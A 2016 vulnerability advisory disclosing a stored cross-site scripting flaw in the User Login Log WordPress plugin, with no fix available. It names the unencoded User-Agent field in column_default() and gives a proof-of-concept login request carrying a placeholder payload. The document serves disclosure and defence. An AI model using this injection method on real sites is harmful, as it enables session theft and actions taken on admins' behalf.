------------------------------------------------------------------------ Stored Cross-Site Scripting vulnerability in User Login Log WordPress Plugin ------------------------------------------------------------------------ Axel Koolhaas, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160724-0011 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on User Login Log [2] WordPress Plugin version 2.2.1. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ There is currently no fix available. ------------------------------------------------------------------------ Introduction ------------------------------------------------------------------------ The User Login Log [2] WordPress Plugin track records of WordPress user login with set of multiple information like ip, date , time, country , city, and user name. A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ This vulnerability exists due to the lack of encoding of the User-Agent HTTP request header. This issue exists in method column_default() that is implemented in the file user-login-log.php. function column_default($item, $column_name) { [...] switch($column_name){ [...] default: return $item[$column_name]; } } ------------------------------------------------------------------------ Proof of concept ------------------------------------------------------------------------ POST /wp-login.php HTTP/1.1 Host: User-Agent: XSSXSS Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.8 Accept-Encoding: gzip,deflate,lzma,sdch Cookie: wordpress_test_cookie=WP+Cookie+check Connection: close Content-Type: application/x-www-form-urlencoded log=&pwd=&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1 ------------------------------------------------------------------------ References ------------------------------------------------------------------------ [1] https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html [2] https://wordpress.org/plugins/user-login-log/